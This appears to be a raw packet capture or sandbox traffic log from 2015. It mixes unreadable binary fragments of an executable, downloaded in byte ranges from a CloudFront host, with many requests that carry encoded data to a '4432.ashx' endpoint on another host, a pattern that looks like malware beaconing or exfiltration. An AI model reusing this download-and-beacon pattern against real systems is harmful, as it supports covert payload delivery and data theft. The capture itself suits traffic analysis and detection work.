 ...9..qv.,_.........:..P.c....m.W..#.J.b..:g.......A.$..Q.G...:..f.U.
..[....."D.......v..A..u..]...AT..w)[email protected].).j...Q b.K.
.7~...6......kc..._...|.L1...l...z. .[.(......|..gO..XeEMb.Ma.".."."&.
.....h...9..y.....[?...u.....EN..M76.......k..<.5b......f8...L...D 
..|..K.i...........<-..(......*BW..[-....<.q.U{........Z../.!j.w
hy8.~.........~.'[email protected]._..e.......AN..Q..._..~.$.~...-.J....'.....Z;
.....@.}..o.h...I..G.S..49......4.B.%W......#....p0k.|{c...QB$=...:.:.
.......$_.tW.X1....Z<.z.F....."...Y...5......&.V.y..i[..N'.z..A.D..
'E8.|$p...K.......#....0..sM._....=..mz.A..BWl.a.|..>...k<.O..9G
..Y.I.....?...[.......).0.:.z.w$......,'s...,O....;u..L~e.......9*Nb..
...6....d...R.#d....K.b~c.1...s.i.........q*E..g..k.z...xB.q...H...M.%
#R.....n.c.=.x\!.).}U.[..X_..6..W.W..........C....Mn.x..K&/..T..[7
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 3000000-3249999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: _ZXmHNWA4Gvc3OKQz9fiKWNcRenG99ZcqVmwV9PjG5E5lDsbwWAW3w==
......BUPE.-4...N.(.....i.n.t.......hU"...@".*d..:...<(d-...4G2-..:
..%y..cyIA...J...<.....TU.#.T.,c..\5....D..M":...Pk.H.... ..ol6$.7.
...k.3B.f (!.a7.....f..6C\.2eU....w.N.........1C..nQ.9F.]g/....&....$.
..ra .Acr0.>,.... XB.q...!,....F2..^y....R`.n1n....Q..!Q..f9tnZ..E.
........./7@.......#,F......M._.W.n;l.....[......'...N....j..}Hk.|...z
.G"akK......6..J........x..Kj...\...Q.j.a...4.i>^..........fZ......
..C|.,eA......._.m....>V,..|8.......T....~.............y.7\-.]<Y
x ..#..b..([email protected].:........n.6...........o?Mu...-...h.Plh
.....Q.....%..L.9....|.6^.;.].8.i..vn.h<,.{........1....X.H.8....m.
w..5c...ur..!.....B......J.......8j.z'.D.".....:.b0.S...(*.3N..".p..t.
....3c..!...<..Y.U............7G.(.......uyl..:..O{.-..~.[=.f.V....
Z.?.I..2...m.C4...H...g.8........ ..\..A..f...m..W....?..,L.....!..r.!
m.!.D.T......i](.C....a,.v{........^......s..n..".3....|..r.?n........
...E.a.6.Xq..F5.(%D....9...'.....A.].8..b]...j....zt....e*...w.J..*8&l
t;-.|....0....d..)......gT..d.Z.D.K:eLC.....^.......D...n..H:#.<..h
B....[.......c....n......r"................F.....9DC-.....%.b..P...V.?
4...@ERy.......;.N.L..b..,..V.8....`..*.....@U#'.,.g.R3...3>.<.?
...`G A.....|.C.*..J..C...`...C[[email protected].".
.|...F..H.N......O...Kp.L.....d....VIU.'.u...FYn.j@).7.e..B....j.....F
...1...F..$q......*y.......Q..%!..5.F..@.`c.yZ...w'.A....i...;...G...N
Z.3..L......s...;..G.....9.j..O.d......py...z.5..5..mQ.....X....!.[..n
2=....F..I...9%.R...2.D.C.F....A.b.....>.....i.;.w..,ch..R..5(z
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3250000-3499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 3250000-3499999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: JXa1bviKHfCzFY-ZcYPvgFvLmwWWHgzIf565dbRWDumTbKopAvqqrA==
g.u..u..f...{.l%....&.9V..D.........]wu.h..I.!4.E.To.&.H@2]..3........
{ &c.e.\Q..9T.K..[...jy....V[..j..`....c..%.:....D..sP......d..7xv../.
.Hn.......F.L.9.......&....[. z...p.../Y.....L......)L.C.\B.L(.?.D..So
.;.7.._M...FJ...wj...RiT..K..A...x......},[email protected] .....
!&.Lq7..PS...`.....%..O.5_mITP.......?.x6Xh\.n~a.w\.&.mo......[.(&j...
..,1~....H.......nU.].....U..h...o}.F(....((wj....\m...]t".\.]@..].#.!
....Tw..TO../.V o.......L.;.VAaH.<...u...=H....`.....Ox8x:........A
.$...-...'t.....#...O...,..Eb.....]..qd...yOv.=d'f.....J.V.....D....2Y
....es..by..j.(..X.;z.`$Y.}..M&=...jNL.}{a......'.........c..R.....'..
.58..\^Y....e@(.S. t:.................Ao..f...7P..]?..-{......m. )h.A.
<....r........ ..%..~..5.v. .LT..".;[email protected]..\[email protected].
H.t..l.w....p..%...h.....}.,.0<K.FI.&.....X..qc.f%.Y.......l%/U....
D.8....$.X...H=..?.G.`U.0U.....p].X.B.h:..F3.N.ODK......P,.%......?.~.
..:.Ll.%,q....8x....;j I/..,.U......|...luh1S.._....q`G.Z y....%......
..d........^.q..c....}.gOq izp...w..\T.c.....}......A....9....r.a@7...
.LFm..S.../....UsC.....:R.\G....s...?.hF......7..;g...*T.X.U...*..n..U
U..p.cY?}y8.<..8..5.).Bi.....b.......x.......j.;......a?o.....7...{
.n.9....[..H.(....N.......3..b.........#?...h2c........EO..E...<...
./..=../.Vc.L.:..gg{[email protected].
.....5.N..b..R0[N.P.2.m.....??...}.o..-.....~>......]xwz_........&a
...m.2...h..z.....(2......,u2.*.M..... n.u....a............_.{..WB...|
.i....gh46Y.Z,.a...Y.O.......ce/..{...<..l...|.uG....M..1..Ie..
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3750000-3973863

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 223864

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 3750000-3973863/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 4ZlewmqY9kt056os0LWVYLTSHIWg8qm1C4aqdqzSKm4-B3SDyUmOQg==
S....V..j...#P.....&..'.......6;.|a=...|.n:.O.<......9KOn.C_......,
..1...f...m..Z......hy....E..{.q.O.A.X.`{......._.=N%.Y.R.g...K2~..q.{
..:.9.<...i..00.?..4WW..L.4.&.K.1.-..L...!S.fL...i.."..R.u.........
.O.o.D..x...k......a...wh.h4.`.Q...."0B'.}.'.... )..:.x>H.g..~@... 
. ...OIj.9j_g........0.......(.s7..."..{.h4.T."...5.$r,:.i..D..%..a...
...OC....~k>...B.E..AdaN..S|s.iI........fi.Abp.Y.N'.c.7.9.....'.&[.
......Iy.?..6..(.:.6.......4(c^oQ;.1....PRE......pn..j."ku...0...].A..
....),...e....HK&..N^e......Y...F-..N....k..Lh*...`....L...kU..qc....V
..w...1.../.......?.<.}5j.Xyn.....)G..g....WImj.m.....H......'~.NU.
Z..R.^.....)...|.V...d...M..k{.*....8......C..K.OS&q3/#.).n........_..
6.t.h.j..Ob..V.gr.v r..X.2.W.^A `y..rr.pn..9'.w........._l..u#.s.w...;
P...tlEf..G...g...~.I..k.../.;..|...H..s...6r.......>w...5%t.X.....
9<]b......4A..,....Fhb.J..|-.}........F.C^.k...6.a..........y.@l.._
..L.8.#U.........RWc3doi.zT... ."CJW...5..F.n......hN C.Z.5.%@...b|..T
....o.$.b.p......X....%..yiq..6~G........Bk...E..=(...6T.<..M....9@
%.yj1..}O..S.).....M...U.T.W.w:<4..aO.]....EO..*PVbz...........|..^
.G. ..2...|.,.y..@.............*a.......7..YM..- ....d.....{.n.Y..Z.I.
*/.u...$......4.*_L...k86.`.s.!.........7..H.' .*...T67ik2..E...x...R.
..×..1..5E.-..x......\J{...M!/..2s...._..J..W.dm......S..4Y.ak..V...
.'FK0...4...>PD6-......dn..x.F.8k. A.[..l....V..o..oH.t....Z..P.x..
.^..>........8......m.F?j..;.....Gb(...c.. .....q...Os.([.g=.2...^/
..lV.aE.lJ..I...|...D.9....:'.Y........Z.....U...!}.".].. l.N....[
<<< skipped >>>

GET /4432.ashx?e=XOxRKBm2zlz43cdm0TeNYmMS6xMm5DPOlM4Je9tLtVemy6t0 u4xzc/4PvVcYKfqUA7dl9owwhIeI9VTThLJ3YHu6LgNep9IiAbyx5Wt1urm9yEbKFRXKSs2YoLIjQ/nWMnNHFDGURlNWDfw1ts4xU6wMsp3Wz5PMAzGRDL7b/3IROPie2z40 X0A62pnUj3KYX3Ti/i3YPXb210L2slDWLsCOEoMJlpBenlCu3G3PiNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVS0Dr1TyY f1LlTZj/ksx1M3QX7hNUcBx HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:26:31 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Mon, 06 Jul 2015 20:26:31 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLRBRa93/wJ4K5g1UaeibIFKYX3Ti/i3YNSfnOwL00n5Z1 bwt5t6kul7 MWoTgv1cPg3JQuiDood/dJkCtxgij8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWMIujBCDs6Ht7GyVF/kSMGlkwAqrxEu3DF7I/BhPOwx7A== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:56 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=lOCrbsNL2zULjT49fHfOTFMHaLbuV9qg/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8yvNHK2ogqjZ/efTFXb5IsdaoPZj94HyTCeQCV5QcxbtPZPHJIIJ7tLPiCC4paVhd2Pbk/9NONlMwdHiAKz3nHY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDLLNMXZjRZW4= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:56 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=AZwPyJy3TZh4HRn2UIUeHjMhuAiDCZy0nvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFYwi6MEIOzoe3sbJUX RIwaWTACqvES7cMRNUTv ezR4CQR6/4IivvmSmqX4 CyMVKUDaBP2Payz94u3oGHN86wPfE/ OuNytPyvTet81FAwHjgb6v7cXpPsCR1eJJaqZuTEmVd5boNaQ9RM9cvdqwuUEQrG4Q2s2p4ghywxFINBPLhsL7x0yEItFgAYD7IlOORzySwR 0UMpQDKCf8yUYWIYaNv1rXN/ko2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VLQOvVPJj5/UuVNmP SzHUzdBfuE1RwHE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:56 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=lOCrbsNL2zULjT49fHfOTFMHaLbuV9qg/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8yvNHK2ogqjZ/efTFXb5IsdaoPZj94HyTCeQCV5QcxbtPZPHJIIJ7tLPiCC4paVhd65Cl b7PgcYaQxEgOaYYTbGJ7NLKRj9nU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:57 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=Lmrmx5d21cHK7BVW0pZkfpc0EuoUEWBpIM0CqmsRfbuUONmYGBhJBq3/AN/bF2roRdb/S8YKHkPcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTZIHVdl5GUgKkO9/DuORuprIIa1xct7IlIfNarWZRfuQ8SpJVUHpEeYCpHZc9ZUaF K90vWg22jgTxIUcsgQ w9JTsKksJzkc9GdOcgDY83FHRy24uRaNd5D1mYH yQN4uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45HPJLBH7RQylAMoJ/zJRhYi3/v52Td23x HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:57 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=Lmrmx5d21cHK7BVW0pZkfpc0EuoUEWBpIM0CqmsRfbuUONmYGBhJBq3/AN/bF2roRdb/S8YKHkPcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTZIHVdl5GUgKkO9/DuORuprIIa1xct7IlIfNarWZRfuQ8SpJVUHpEeYCpHZc9ZUaFteqZ6txLbCymF904v4t2Dnog6XUlbewcH2RZLt1dnp6UixEX0xfzw4HtieZnm 5lfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgX kLq5c4q1u/WL/VEXbxSEIgVGveQowIH HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:57 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERJOW4G7RSbXnJzBAJhcf/vDKYX3Ti/i3YOdKlZ7h7cKpMVf 88v DEXLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOORzySwR 0UMpQDKCf8yUYWIt/7 dk3dt8Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:57 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERJetwXok6MQkygRO0KnCdHCCNiNeNKIpAJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgX kLq5c4q1u/WL/VEXbxSEIgVGveQowIH HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:58 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=N6dOqWm8Q94fEbCpbJoCfl DeWF87/a tcdaVQJz0Lv UINFgbXOio5xPF2gxegOjOluN4MfK82okOeVQ5E0okWABgPsiU45HPJLBH7RQylAMoJ/zJRhYuWxknbJ8xO1QS3i7uWq3ey09V1QzwojTzzcpdlMXfDB0LGw gTQHOXEEASnTAt8o vdWl3XnoKt0JQd5HxgIXd4Ck/GAouPo3pu1a2/pSyUlKYWIS4b/TwQz5kcPJsPBXgEPYkm2R 4CM84BubBye2orW/U9pNYEne5haHOFLYKd5SlKONgbzwnZSRpvuXhKkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndge7ouA16n0iIBvLHla3W6ub3IRsoVFcpzK XYKCjTu0= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:58 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=j7YMo/n29XPJd3Cl8WpRrisj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLciXFAHp4HlL1HtSmBYQHI0JQd5HxgIXeHOq2aoArvNY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VLQOvVPJj5/UuVNmP SzHUzdBfuE1RwHE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:58 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=vjRn qH YuNfg3lhfO/2vrXHWlUCc9C7/lCDRYG1zoqOcTxdoMXoDozpbjeDHyvNqJDnlUORNKJFgAYD7IlOORzySwR 0UMpQDKCf8yUYWLlsZJ2yfMTtUEt4u7lqt3stPVdUM8KI0883KXZTF3wwdCxsPoE0BzlnbJKYwPfuhDE5OzB3lHNZDDg9SakjfptxJ3Q48ku2 MNZxDwj5vyAYr4bF0jrN61xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsqpqi7TBEiKvbDp/KqjdfkY7eULofKnZHg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:58 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=xY8ohDYpM j7QFMK1iR6ljGi57tKDBZAyMlYLXuYTiQeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcX4l9XCm/Va8FwTBnjqtB6SJSQWKLfKoAjgb6v7cXpPtruJ2zeNP9BRjldEvIPSqUX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF/pC6uXOKtbv1i/1RF28UhCIFRr3kKMCBw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:59 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=/k6kR j50tpQhScA1jb3T1HUtxFT8zgWnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFYwi6MEIOzoe3sbJUX RIwaWTACqvES7cMRNUTv ezR4CQR6/4IivvmSmqX4 CyMVKUDaBP2Payz94nJwzEzT2yE8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpVgEOMXjo7/CYZ2nwp731j3GfAEMCG5iHMC5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkc8ksEftFDKUAygn/MlGFiLf /nZN3bfE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:59 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Mon, 06 Jul 2015 20:25:59 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /4432.ashx?e=/9ZmISdorEsrtsyJz2huuzGi57tKDBZAEhGH33nPGlEeaFNcfNJ0DqkO9/DuORuprIIa1xct7IlIfNarWZRfueseCNypxTRvYCpHZc9ZUaH6MIOzDij/FhQC drCF7eFJbqKp/8aFwxJ6jPseS6H6rKvpxbP8RnAEuJwrUmAgU48TCxIgxbNUN9iFWinPncqRTkwMJcPGBf6QurlzirW79Yv9URdvFIQiBUa95CjAgcklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:56 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=lOCrbsNL2zULjT49fHfOTFMHaLbuV9qg/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8yvNHK2ogqjZ/efTFXb5IsdaoPZj94HyTCeQCV5QcxbtPZPHJIIJ7tLPiCC4paVhdMjNPpg04wp5PJSvtznUqJGbmFw3eeWJ0LF5FjnIRYED/OBEyqhe3A4cQRUyfrCw1zIhutCMBGewHfwT3XPm7ZSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJpHZ15mOZ7RI= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:56 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=iDRrwQhh7wubZPRBHClMwBAZQSgySSeP/ToTRiVFxVRrBKqdyQvXy8FqjxctBQAySlCyq068/M1FOTAwlw8YF/pC6uXOKtbv1i/1RF28UhCIFRr3kKMCB3wF8xC533FcDPI5dGTWg78vFILB9JD7Z4ZVJDBzh9KR1QHs3X92ilGOTz1mAXFvBrPiCC4paVhd51vWMEpOYI9vFWuyZiLPwZdd8oa6X2ADHiBn688lkcr8toCm18jzw11KFwF9lIs91urDxSq54gssWphB8HvgGC5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkc8ksEftFDKUAygn/MlGFiLf /nZN3bfE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:56 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLM8BMMVZLFq8mxw368usKjpjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVS0Dr1TyY f1LlTZj/ksx1M3QX7hNUcBx HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:57 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


